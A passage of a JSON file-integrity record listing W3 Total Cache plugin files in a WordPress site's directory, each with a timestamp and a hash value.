gins\\/w3-total-cache\\/Cdn_RackSpace_Api_CloudFiles.php\":{\"d\":1526741203,\"h\":\"ad2d331397bbcda531df578446e444f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Page_View.js\":{\"d\":1526741203,\"h\":\"3241e43fd098ea1fd1b710daee7417ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ObjectCache_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"ef2f7c70d33d450f0cd44c796d1182e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemOperationException.php\":{\"d\":1526741203,\"h\":\"631d6191b3001b826e7ec49e670f47fd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Widget_View.php\":{\"d\":1526741203,\"h\":\"47526f4b65e8f3e6235ba18d1acccf9a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Wincache.php\":{\"d\":1526741203,\"h\":\"cba890d45b3063a6b830c59f8797e180\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/changelog.txt\":{\"d\":1526741203,\"h\":\"334b138cbc2ef4f53d3df4462f78d57e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Page_View.js\":{\"d\":1526741203,\"h\":\"ddaf2355235f0593d049026f909c50be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Genesis_Page.php\":{\"d\":1526741202,\"h\":\"af7ba13f1ffb67d617a005e10726a82e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Page.php\":{\"d\":1526741203,\"h\":\"5dc566300ce755dc2e8825028c783081\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Apc.php\":{\"d\":1526741203,\"h\":\"54ccaff2a035559742c0a809acd897a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_Wpdb.php\":{\"d\":1526741203,\"h\":\"0f29087232b2ee070f9e174fa05a4d7c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Enterprise_SnsBase.php\":{\"d\":1526741203,\"h\":\"09c0e7bfd078a7c059e489b66a35083a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PageSpeed_Widget_View.css\":{\"d\":1526741203,\"h\":\"16c0ec479e215123df6f44d0d51f941a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Popup_View_Success.php\":{\"d\":1526741202,\"h\":\"ac7012baaa180cd714f3e9bc8689946f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Widget_View.php\":{\"d\":1526741203,\"h\":\"8af48ada48db36b6116577ece0ffa8d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Activation.php\":{\"d\":1526741203,\"h\":\"d74d120450255c745df3090b57a3ad1a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_Extract.php\":{\"d\":1526741203,\"h\":\"21c8f33028400a35844edfac8da60cae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ObjectCache_WpObjectCache.php\":{\"d\":1526741203,\"h\":\"dd7642c19b6cf8eab590219a7326cb49\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Widget_View_NotConfigured.php\":{\"d\":1526741203,\"h\":\"1b6d85a52e69c6655d3ae75261cf859d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Widget_View_Browser.php\":{\"d\":1526741202,\"h\":\"37e5def865d0557f9eefa3e88573ca47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Root_Environment.php\":{\"d\":1526741203,\"h\":\"248768177ea4ade7133b24b27a3b9739\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_Cotendo.php\":{\"d\":1526741203,\"h\":\"819c4818cd2f49eb214ad11425eca78f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_Edgecast.php\":{\"d\":1526741203,\"h\":\"d0054da42a40300cd3e0ee4b7c5acf46\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Page_View.php\":{\"d\":1526741203,\"h\":\"20632320b873a396fa3b6a8fda83784b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ObjectCache_Page.php\":{\"d\":1526741203,\"h\":\"b746f5fb42fea9a34fa8dcb86fc83e02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_View_Dashboard.js\":{\"d\":1526741203,\"h\":\"1e52e47a927428cb8a1d7c6b879415f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Page_View.php\":{\"d\":1526741203,\"h\":\"80f3d7b06d5b31be55e4a08e0885d0bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Plugin.php\":{\"d\":1526741203,\"h\":\"905339637591278b28147006bc33430f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Licensing_AdminActions.php\":{\"d\":1526741203,\"h\":\"2b036a8471e4a7ccb0a4cd5a7d437f21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Widget_View_Disabled.php\":{\"d\":1526741203,\"h\":\"2680f2b7704162c3489b209a8f624596\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Core.php\":{\"d\":1526741203,\"h\":\"d8ad85e8f6d844aaa5e2f0a965637ecd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Popup_View_Zones.php\":{\"d\":1526741203,\"h\":\"887f1ad636e5ac3db79e375dc59ecad5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_AdminActions.php\":{\"d\":1526741203,\"h\":\"1eb3da03e0370380eeb0863136105408\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_RackSpaceCloudFiles.php\":{\"d\":1526741203,\"h\":\"22fc4d3306ed762fac76426b37416385\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_LimeLight_Popup_View_Success.php\":{\"d\":1526741203,\"h\":\"8a503bb78c20ed0b8e72bb8ad2cc6b55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup_View_Services.php\":{\"d\":1526741203,\"h\":\"20164da04aa3b8617a3ae753ef562c48\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Popup_View_Success.php\":{\"d\":1526741203,\"h\":\"065343010a9461fbd6014baa8d56e67b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Request.php\":{\"d\":1526741203,\"h\":\"c73bcd41940c84c2c6ac0da5a5af74f9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/BrowserCache_Page.php\":{\"d\":1526741203,\"h\":\"64af9b98c36b12b5a53cba6ee9ccc30e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_WpdbInjection_QueryCaching.php\":{\"d\":1526741203,\"h\":\"cc0bbb2585ba2ef0cffe6e0a376d76d9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/press.txt\":{\"d\":1526741203,\"h\":\"6c9954b2e1c1405838603589c0bcd4df\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Cdn_Page_View.php\":{\"d\":1526741203,\"h\":\"0c151c63bd6afb72e1d2a566fe73875b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_LimeLight_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"6926b78b64858b5390a986b128eadb09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_WpdbInjection.php\":{\"d\":1526741203,\"h\":\"8787577d4a1adad27bc18e1ce31a5d76\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Widget.php\":{\"d\":1526741203,\"h\":\"7ac253ee389224772443842fb6d589b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FeedBurner_Page_View.php\":{\"d\":1526741203,\"h\":\"876e3a4ad16697623215752352efffcf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_GoogleDrive_Page_View.php\":{\"d\":1526741203,\"h\":\"ed8d02aedd5c7cc8333939c07e10f036\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"bcba31ade2f39e7e0b07e3ba51011ed6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_LimeLight_Popup.php\":{\"d\":1526741203,\"h\":\"de498f9127100d125bb6ae55fbfa0c92\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Page_View.php\":{\"d\":1526741203,\"h\":\"ef067635b274a95cd06685969345ed26\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Varnish_Plugin.php\":{\"d\":1526741203,\"h\":\"5ea067ee65cc30cb2d69f7688e324387\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_WidgetSpreadTheWord_Plugin.php\":{\"d\":1526741203,\"h\":\"f227a5127209ceec0cea35299d2f5fb4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_GeneralPage_View_ShowHelp.js\":{\"d\":1526741203,\"h\":\"972e931e7edd2fce3b7cec5c9fc90c48\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/ModuleStatus.php\":{\"d\":1526741203,\"h\":\"b3bdc92ffa75b15cbe12ceb7aff8fc1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Engine.php\":{\"d\":1526741203,\"h\":\"afb905be31b79f308a11fa4a249da009\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_PageUrls.php\":{\"d\":1526741203,\"h\":\"c51dad9908a798122b62861e551d7c88\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PageSpeed_Plugin_Widget.php\":{\"d\":1526741203,\"h\":\"3034959371c31e9310fb1a80e7f0441a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_GeneralPage.php\":{\"d\":1526741203,\"h\":\"58bb84cb011eb7ac9008ecfb589bc35a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Mime.php\":{\"d\":1526741203,\"h\":\"5e0731a7fb0d043f0229341ee04e9441\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Page_View.php\":{\"d\":1526741203,\"h\":\"1b9e6cca3595a78e1ccef564701f8ec7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Popup_View_Zone.php\":{\"d\":1526741203,\"h\":\"5585e26837ce44e00c3ebee3247a66ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Api.php\":{\"d\":1526741203,\"h\":\"8234f62a0ede01c1059ccd2fd0a80e4b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Popup_View_SelectHost.php\":{\"d\":1526741203,\"h\":\"a2e86ba5dfb77cc2cf27b9d13e5b4f6c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Util.php\":{\"d\":1526741203,\"h\":\"6ca8bf3b86bdecad9cf25220830884d5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Mobile_Redirect.php\":{\"d\":1526741203,\"h\":\"69bff375ba703d102eb405201f131e30\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Plugin_WidgetMaxCdn_View_Unauthorized.php\":{\"d\":1526741203,\"h\":\"472bd5a6fa62c5c983a8d608ae8dc603\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PageSpeed_Widget_View.js\":{\"d\":1526741203,\"h\":\"2b4f47c73ce3ebf6f67ce65f07115cb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_Akamai.php\":{\"d\":1526741203,\"h\":\"8270c704b3b958a4ce1b7e9438606bbd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Popup_View.js\":{\"d\":1526741203,\"h\":\"89ac266b0d35e56ccdd1530c565a0113\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Popup.php\":{\"d\":1526741203,\"h\":\"40151cf4c9daacd5f304bdb412206fe5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Memcached_Stats.php\":{\"d\":1526741203,\"h\":\"e08953b7ec132c68715e1b58ebf86b55\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Xcache.php\":{\"d\":1526741203,\"h\":\"53d0f7dd250f19b1634bebb51f373ce8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Rule.php\":{\"d\":1526741203,\"h\":\"99a18ef74580366f8d0458d50f05c4c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_Page_View_Header.php\":{\"d\":1526741203,\"h\":\"851869c91ecf7aba29964f1e8c44ed94\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_StorageWriter.php\":{\"d\":1526741203,\"h\":\"7180c0127d6b58164551d1af065e6f64\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Core_Admin.php\":{\"d\":1526741203,\"h\":\"0d4b3f1ce2a94470f9e0c40407bf9262\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Memcached.php\":{\"d\":1526741203,\"h\":\"c33f30460ab82f2569bb53b3377b2a34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Plugin_Admin.php\":{\"d\":1526741202,\"h\":\"e175777199278af434ffff69c4223fed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCdn_Popup.php\":{\"d\":1526741203,\"h\":\"cc2e19d69da76b11c20bd945478d0dde\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Page_View.js\":{\"d\":1526741203,\"h\":\"e9dfc491ce85ec7c7dd3e36a1797d3e3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Widget_View.js\":{\"d\":1526741203,\"h\":\"8df35ef8834de4416320cc8ae196a228\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Licensing_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"0e90cb2c1e6621071cf6e7dd4c38df23\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemModifyException.php\":{\"d\":1526741202,\"h\":\"91ee29f25eecbf258928faa1e4e0708d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Api.php\":{\"d\":1526741203,\"h\":\"3397dad020af57972eb689a0203299ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Plugin.php\":{\"d\":1526741203,\"h\":\"6a9ff58a2446c8d9c7586f4aeb440a22\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Widget_View.css\":{\"d\":1526741203,\"h\":\"cbdad1bb8c157fa190e95b656f45c444\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_CloudFront_Engine.php\":{\"d\":1526741203,\"h\":\"2a421333bc06670f6b73b7e377114132\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Popup_View_Success.php\":{\"d\":1526741203,\"h\":\"9e7a94ec279ab7afccdde254794ffb02\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Core.php\":{\"d\":1526741203,\"h\":\"fb6587ae9c4efdc8693b966922efd53f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Page_View_Fsd_HeaderActions.php\":{\"d\":1526741202,\"h\":\"8b7b03097785da52fc0979a4fe920a73\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Page_View.php\":{\"d\":1526741202,\"h\":\"b81145806b5306491d6ea8d736c8ed2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_Environment.php\":{\"d\":1526741203,\"h\":\"26f2264eb1f8d0ceaa7821213752c2ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/DbCache_Environment.php\":{\"d\":1526741203,\"h\":\"867db7092c2908051252f4e18f6d087e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/UsageStatistics_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"3b4fe8623aaa1ecbaf022dbeda18c645\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Faq.php\":{\"d\":1526741203,\"h\":\"9f46d3180ca51c87ad1f11691d21971a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Genesis_Page_View.php\":{\"d\":1526741203,\"h\":\"ec394c4f5c1e6c44f6f591cbe3d2a76b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/BrowserCache_Core.php\":{\"d\":1526741203,\"h\":\"e97a9ed20b2b2b450062efcc211e3908\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"006e3f41dae08eba37e1cb6474fae1d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_MaxCdn_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"e24f13c1c03b44ca0ebf98c3e2fa12f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Highwinds_Widget_View_NotConfigured.php\":{\"d\":1526741203,\"h\":\"26bd5154c3e740e45679a3f0c1071dec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"77e757d3549bc06d4e0143eb4faf7244\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_Swarmify_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"6c6af2145094f8ca5ed0c793c0e618f2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_S3_Cf_S3.php\":{\"d\":1526741203,\"h\":\"2229e5113f86738474961bf8d735ba21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_ContentMinifier.php\":{\"d\":1526741203,\"h\":\"e293683c589746d844ebc54c095f7b38\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Popup.php\":{\"d\":1526741203,\"h\":\"333218c8c456d447cd8b8d686bfd52b7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_MaxCdn_Engine.php\":{\"d\":1526741203,\"h\":\"d471f27f8db416ca4cc3e42c9bc47683\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Mobile_Referrer.php\":{\"d\":1526741203,\"h\":\"d248f39288613fbcc775b696ba6371a0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Popup.php\":{\"d\":1526741203,\"h\":\"2a6f1499f3eed100c1c82af06201f7e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Page.php\":{\"d\":1526741203,\"h\":\"4ca9bd4860d5c30dc61bb50e5e1cc95e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_StackPath_Popup_View_Zone.php\":{\"d\":1526741203,\"h\":\"9cb251c3629a3195c8e260f83d9c723c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Enterprise_Dbcache_WpdbInjection_Cluster.php\":{\"d\":1526741203,\"h\":\"bf3f84c40219ced546eefe814d912995\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Page.php\":{\"d\":1526741203,\"h\":\"ef210fe722ea011ef394b310d56bfe51\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_S3.php\":{\"d\":1526741203,\"h\":\"61f6350f13fedfce8d8ee6531ef1ddac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_StackPath.php\":{\"d\":1526741203,\"h\":\"8c453f8595674ec2f67ac4548281210c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_WidgetSpreadTheWord.js\":{\"d\":1526741203,\"h\":\"076c151ab596f0e1193e24e54209e851\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_Page_CookieGroups_View.js\":{\"d\":1526741203,\"h\":\"8d7de1eef67ea357bfa977dc963903cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/CdnEngine_Mirror_Highwinds.php\":{\"d\":1526741203,\"h\":\"691ba75bd23ba4dabd0f05fbdb3d3c7a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_RackSpaceCloudFiles_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"26c07c32c6f02d0464633fc9773cd2e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_Core.php\":{\"d\":1526741203,\"h\":\"31a92e39ad08ab29de271374f93a93ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Minify_HelpPopup_View.php\":{\"d\":1526741203,\"h\":\"52aec46de8bb2cfa548b1b9bb31b288d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FeedBurner_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"34c7daaab1b0ff6807e3dac0850a9b89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PgCache_ConfigLabels.php\":{\"d\":1526741203,\"h\":\"ccc54bbecde6858d90744dbefdcc506d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_Http.php\":{\"d\":1526741203,\"h\":\"8c958584eea666621249c9b547e7caf8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdnfsd_Plugin_Admin.php\":{\"d\":1526741203,\"h\":\"0cff4e2ee939ccef7ad7a524500f6f97\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_Api.php\":{\"d\":1526741203,\"h\":\"a60f749a950334d798cf9bc80fd920ae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_Popup_View_Intro.php\":{\"d\":1526741203,\"h\":\"b70bdee4cfe24990e92c3386bb3c949b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_Page_View_Header.php\":{\"d\":1526741203,\"h\":\"a556ef892c84473bee57017cbde9ac24\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_CloudFlare_AdminActions.php\":{\"d\":1526741203,\"h\":\"8956b8e770157109cd368b3eae3ddfe7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cdn_StackPath_Page_View.js\":{\"d\":1526741203,\"h\":\"5c6a2c4193f213f679e2109770169b09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache_Memcache.php\":{\"d\":1526741203,\"h\":\"5bde83614e07b19a039465826c3ec61f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_UsageStatistics.php\":{\"d\":1526741203,\"h\":\"c98d417b31a9f0bfaf0b2656182e1992\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Util_WpFile_FilesystemMkdirException.php\":{\"d\":1526741203,\"h\":\"4accd9441a8be0f0c3ceb8ea8463bdde\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/PageSpeed_Widget_View.php\":{\"d\":1526741203,\"h\":\"7f5a9c6aaaefb9aaa988ebcbb3c1f873\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Generic_Page_Dashboard.php\":{\"d\":1526741203,\"h\":\"171a6746c5ed16951a01832eb54e73c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_NewRelic_Widget_View_Apm.php\":{\"d\":1526741203,\"h\":\"ff4e63029ac89cda35128474c81f2a5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Extension_FragmentCache_Core.php\":{\"d\":1526741203,\"h\":\"111373d7cc8501ef295b1328b1647bc8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/Cache.php\":{\"d\":1526741203,\"h\":\"376284c5d7e301300d5c816d95c0f0c8\"},\"\\/home2\\/zphiblgz\\/